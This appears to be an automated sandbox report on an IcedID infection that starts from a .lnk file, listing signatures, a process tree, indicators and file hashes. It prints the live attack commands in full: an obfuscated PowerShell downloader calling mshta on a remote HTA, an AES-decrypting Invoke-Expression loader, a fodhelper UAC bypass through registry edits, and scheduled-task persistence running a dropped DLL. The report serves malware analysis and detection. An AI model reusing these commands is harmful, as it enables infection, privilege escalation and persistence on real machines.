Analysis
- Max time kernel: 146s
- Max time network: 153s
- Platform: windows10-2004_x64
- Resource: win10v2004-20220414-en
- Submitted: 24-05-2022 12:24
- Static task: static1
- Behavioral task: behavioral1
- Sample: 54267-876-8676.lnk
- Resource: win7-20220414-en
General
- Target: 54267-876-8676.lnk
- Size: 2KB
- MD5: 9edabe11d846a6de5d337e737d24e85c
- SHA1: 26f63aac40c4e9f459a379eec94a258b604f582e
- SHA256: 4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023
- SHA512: 5e88d418cb26f4bfd7bf5d1b2dbf31a8f026bbf29c760919d2986c883de6067df75c5eb8ca790a2c4a7ef09b87a2c6ba1b62e57e76fc3b32af633317639c6f0e
Malware Config
- Extracted: https://modhub.com.br/upload.hta
- Extracted: icedid
  109932505
  ilekvoyn.com
Signatures
- suricata: ET MALWARE Win32/IcedID Request Cookie
- Blocklisted process makes network request (7 IoCs)
  Processes (flow | pid | process):
  5 | 5012 | mshta.exe
  6 | 5012 | mshta.exe
  8 | 5012 | mshta.exe
  10 | 5012 | mshta.exe
  12 | 1264 | powershell.exe
  13 | 1264 | powershell.exe
  70 | 3252 | Rundll32.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | mshta.exe
- Loads dropped DLL (1 IoC)
  Processes (pid | process):
  3252 | Rundll32.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
- Drops file in Program Files directory (2 IoCs)
  Processes (description | ioc | process):
  File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7b1931ba-c4f4-4fa7-9e4f-6f6adc2af7ab.tmp | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220524122518.pma | setup.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
- Modifies registry class (11 IoCs)
  Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell | powershell.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lxpwR.bat" | powershell.exe
- Suspicious behavior: EnumeratesProcesses (19 IoCs)
  Processes (pid | process):
  4300 | powershell.exe
  4300 | powershell.exe
  1264 | powershell.exe
  1264 | powershell.exe
  3684 | msedge.exe
  3684 | msedge.exe
  1544 | msedge.exe
  1544 | msedge.exe
  3200 | powershell.exe
  3200 | powershell.exe
  3200 | powershell.exe
  2996 | identity_helper.exe
  2996 | identity_helper.exe
  3252 | Rundll32.exe
  3252 | Rundll32.exe
  5108 | msedge.exe
  5108 | msedge.exe
  5108 | msedge.exe
  5108 | msedge.exe
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (4 IoCs)
  Processes (pid | process):
  1544 | msedge.exe
  1544 | msedge.exe
  1544 | msedge.exe
  1544 | msedge.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 4300 | powershell.exe
  Token: SeDebugPrivilege | 1264 | powershell.exe
  Token: SeDebugPrivilege | 3200 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3200 | powershell.exe
  Token: SeSecurityPrivilege | 3200 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3200 | powershell.exe
  Token: SeLoadDriverPrivilege | 3200 | powershell.exe
  Token: SeSystemProfilePrivilege | 3200 | powershell.exe
  Token: SeSystemtimePrivilege | 3200 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3200 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3200 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3200 | powershell.exe
  Token: SeBackupPrivilege | 3200 | powershell.exe
  Token: SeRestorePrivilege | 3200 | powershell.exe
  Token: SeShutdownPrivilege | 3200 | powershell.exe
  Token: SeDebugPrivilege | 3200 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3200 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 3200 | powershell.exe
  Token: SeUndockPrivilege | 3200 | powershell.exe
  Token: SeManageVolumePrivilege | 3200 | powershell.exe
  Token: 33 | 3200 | powershell.exe
  Token: 34 | 3200 | powershell.exe
  Token: 35 | 3200 | powershell.exe
  Token: 36 | 3200 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3200 | powershell.exe
  Token: SeSecurityPrivilege | 3200 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3200 | powershell.exe
  Token: SeLoadDriverPrivilege | 3200 | powershell.exe
  Token: SeSystemProfilePrivilege | 3200 | powershell.exe
  Token: SeSystemtimePrivilege | 3200 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3200 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3200 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3200 | powershell.exe
  Token: SeBackupPrivilege | 3200 | powershell.exe
  Token: SeRestorePrivilege | 3200 | powershell.exe
  Token: SeShutdownPrivilege | 3200 | powershell.exe
  Token: SeDebugPrivilege | 3200 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3200 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 3200 | powershell.exe
  Token: SeUndockPrivilege | 3200 | powershell.exe
  Token: SeManageVolumePrivilege | 3200 | powershell.exe
  Token: 33 | 3200 | powershell.exe
  Token: 34 | 3200 | powershell.exe
  Token: 35 | 3200 | powershell.exe
  Token: 36 | 3200 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3200 | powershell.exe
  Token: SeSecurityPrivilege | 3200 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3200 | powershell.exe
  Token: SeLoadDriverPrivilege | 3200 | powershell.exe
  Token: SeSystemProfilePrivilege | 3200 | powershell.exe
  Token: SeSystemtimePrivilege | 3200 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3200 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3200 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3200 | powershell.exe
  Token: SeBackupPrivilege | 3200 | powershell.exe
  Token: SeRestorePrivilege | 3200 | powershell.exe
  Token: SeShutdownPrivilege | 3200 | powershell.exe
  Token: SeDebugPrivilege | 3200 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3200 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 3200 | powershell.exe
  Token: SeUndockPrivilege | 3200 | powershell.exe
  Token: SeManageVolumePrivilege | 3200 | powershell.exe
  Token: 33 | 3200 | powershell.exe
  Token: 34 | 3200 | powershell.exe
- Suspicious use of FindShellTrayWindow (3 IoCs)
  Processes (pid | process):
  1544 | msedge.exe
  1544 | msedge.exe
  3252 | Rundll32.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description | pid | process | target process):
  PID 4476 wrote to memory of 4300 | 4476 | cmd.exe | powershell.exe
  PID 4476 wrote to memory of 4300 | 4476 | cmd.exe | powershell.exe
  PID 4300 wrote to memory of 5012 | 4300 | powershell.exe | mshta.exe
  PID 4300 wrote to memory of 5012 | 4300 | powershell.exe | mshta.exe
  PID 5012 wrote to memory of 1264 | 5012 | mshta.exe | powershell.exe
  PID 5012 wrote to memory of 1264 | 5012 | mshta.exe | powershell.exe
  PID 1264 wrote to memory of 1544 | 1264 | powershell.exe | msedge.exe
  PID 1264 wrote to memory of 1544 | 1264 | powershell.exe | msedge.exe
  PID 1544 wrote to memory of 1452 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 1452 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3792 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3684 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 3684 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
  PID 1544 wrote to memory of 4432 | 1544 | msedge.exe | msedge.exe
Processes (indented by depth in the process tree; the number is the depth reported by the sandbox)
Depth 1: C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\54267-876-8676.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Depth 3: C:\Windows\system32\mshta.exe
      Command line: "C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta
      - Blocklisted process makes network request
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      Depth 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $UGJgEhmuQd = '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';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF)
        - Blocklisted process makes network request
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        Depth 5: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\DeepL_Logo_darkBlue_v2.svg
          - Adds Run key to start application
          - Enumerates system info in registry
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa063d46f8,0x7ffa063d4708,0x7ffa063d4718
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
            - Suspicious behavior: EnumeratesProcesses
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 /prefetch:8
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4028 /prefetch:8
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:8
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
            - Drops file in Program Files directory
            Depth 7: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff797c35460,0x7ff797c35470,0x7ff797c35480
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:8
            - Suspicious behavior: EnumeratesProcesses
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:8
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:8
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4104 /prefetch:2
            - Suspicious behavior: EnumeratesProcesses
          Depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1984 /prefetch:8
        Depth 5: C:\Windows\System32\fodhelper.exe
          Command line: "C:\Windows\System32\fodhelper.exe"
          Depth 6: C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" "
            Depth 7: C:\Windows\system32\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" *
              Depth 8: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell.exe function lXaTHPIMgDeIVvlfqHA ($nARswVhMRcfL){ $SfuFUBdulKOIhfkjXUL = 'Core update check'; $yIeGITfeyZCr = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $SfuFUBdulKOIhfkjXUL; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @yIeGITfeyZCr -Force}; lXaTHPIMgDeIVvlfqHA C:\Users\Admin\AppData\Local\Temp\0397ase.dll
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              Depth 8: C:\Windows\system32\cmd.exe
                Command line: cmd /c del "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat"
Depth 1: C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Depth 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
Depth 1: C:\Windows\system32\Rundll32.exe
  Command line: Rundll32.exe C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 45c815f0a0e10f75c450369e5b8673f9
  SHA1: b3f8e50200afefd0e4c271c3de84ef4d93c5f6c9
  SHA256: 4bd75d9f94626d1a4b514515dfa9c1abfca3d5a1a36f4d1f0dfb8489db453a97
